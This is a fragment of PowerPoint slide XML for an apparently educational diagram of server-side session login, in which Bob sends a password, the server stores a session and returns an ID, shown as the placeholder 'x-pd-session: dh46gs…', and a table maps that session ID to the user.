              <a:r>
                <a:t>Hi, I’m Bob! Here’s my password.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2150" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>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353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2151" name="1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2157" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15900094" y="6013969"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2153" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2154" name="Hi Bob! Nice to see you! Remember this ID and send it to me in future."/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="203517"/>
              <a:ext cx="6648730"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3000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Hi Bob! Nice to see you! Remember this ID and send it to me in future.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2155" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>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353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2156" name="2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2162" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2309309" y="10122474"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2158" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2159" name="OK cool. I’ll remember that."/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="432117"/>
              <a:ext cx="6648730"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3000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>OK cool. I’ll remember that.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2160" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>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353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2161" name="3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2163" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8805734" y="5633683"/>
            <a:ext cx="6772500" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2164" name="/account/login"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8883932" y="4613104"/>
            <a:ext cx="3082244"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3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>/account/login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2165" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8805734" y="7690051"/>
            <a:ext cx="6772500" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2166" name="x-pd-session: dh46gs…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10867732" y="7847716"/>
            <a:ext cx="4691795"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sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>x-pd-session: dh46gs…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2167" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="17533035" y="1512929"/>
          <a:ext cx="6106572" cy="2312880"/>
        </p:xfrm>
        <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="0" firstRow="1" lastCol="0" lastRow="0" bandCol="0" bandRow="0" rtl="0">
                <a:tableStyleId>{C7B018BB-80A7-4F77-B60F-C8B233D01FF8}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2850790"/>
                <a:gridCol w="3243081"/>
              </a:tblGrid>
              <a:tr h="460035">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>session_id</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:solidFill>
                      <a:srgbClr val="25C151"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>user</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:solidFill>
                      <a:srgbClr val="25C151"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="460035">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400">
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>dh46gs..</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400">
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>bob</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="460035">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="460035">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="460035">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2172" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15900094" y="3290377"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2168" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="5DB2F4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2169" name="Server creates a session, and stores the info on their side."/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="203517"/>
              <a:ext cx="6648730"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i="1" sz="3000">
                  <a:solidFill>
                    <a:srgbClr val="5DB2F4"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Server creates a session, and stores the info on their side.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2170" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="5DB2F4"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2171" name="i"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>i</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152"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2152"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2163"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2163"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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ID="10" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2172"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
